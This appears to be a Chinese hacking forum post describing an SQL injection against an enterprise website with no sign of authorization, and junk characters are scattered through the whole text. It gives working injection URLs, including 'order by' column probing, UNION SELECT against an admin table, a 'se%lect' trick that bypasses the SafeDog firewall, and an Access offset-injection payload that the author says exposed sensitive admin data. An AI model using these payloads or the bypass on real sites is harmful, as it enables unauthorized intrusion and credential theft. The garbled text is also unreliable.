打开网站,一个企业站。: w8 a6 O, _. q5 e q; K0 ?; X
% R" o6 \2 u# j4 P7 [# T
6 L$ S2 W8 y0 e" [1 B( Q1 _2 t# A顺手加个admin
$ ?5 o9 \5 [- N4 W2 T+ I; L+ k. D$ |7 A4 N3 z: C2 D- t( b
* Q/ P' B) }8 N1 ^ y! ]
默认后台。9 r' P" @8 W9 R( }
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
/ D+ ^, v( F9 a1 n5 U0 R! [" K3 Q/ }* k
, Q& P# G& R# {- D6 [: `+ h2 F: R- [! B: ]% P- o2 X: V
所以就不用御剑扫了,待会直接封IP。
; f2 z+ X0 W( W# F! A' u0 a# J # z- O& V# [3 ?" y5 i
用order by语句判断是否存在注入。% J$ P) J% z. D; G: ?5 T- j0 `
http://www.xxx.com /product_show.asp?id=997 order by 1
3 D6 R) }/ T9 K" W/ |: H( H* nhttp://www.xxx.com /product_show.asp?id=997 order by 100
/ r6 p8 _' W1 y6 E0 C5 A# t% u- H现在存在注入,经测试后发现是9个字段。! @" ]" h$ K/ i5 M6 e5 F% y% d% I
8 P$ I3 F" ^+ C% c8 s4 q3 v: L接下来进行联合查询,猜是否存在admin表。! B5 a( ~' a, P' b/ `9 f- @
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
5 d7 P$ R) q0 N+ y
$ u! _" F" h" E9 N1 a9 Q/ E: [& ?: Y& X: O
% R3 V- i) w) T [6 y5 a在select中间加个%,se%lect绕过安全狗。
5 `) I# j1 U8 b( A, F a
# q: d) h. f6 M9 z9 i1 o$ r0 f' S/ ^: ~2 m
发现存在admin表,然后开始手工猜常用的字段。
' y- e1 c' p/ V纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。' A9 q i) H9 @4 R
( t1 P/ x; u8 s2 d1 E M突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。 y; F. p h Q# T- M
% ^8 ]2 S$ a& Z' z
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
{! Z- C+ r$ i$ q0 U i/ @http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin% @ U4 M; H3 m, W6 z5 K
好了,敏感内容出显了。
! ?( o R. e" Z# y y; o( s8 S& B, y) ^( t
; H1 ? ?' Q5 v
3 p, ]; b/ G' e |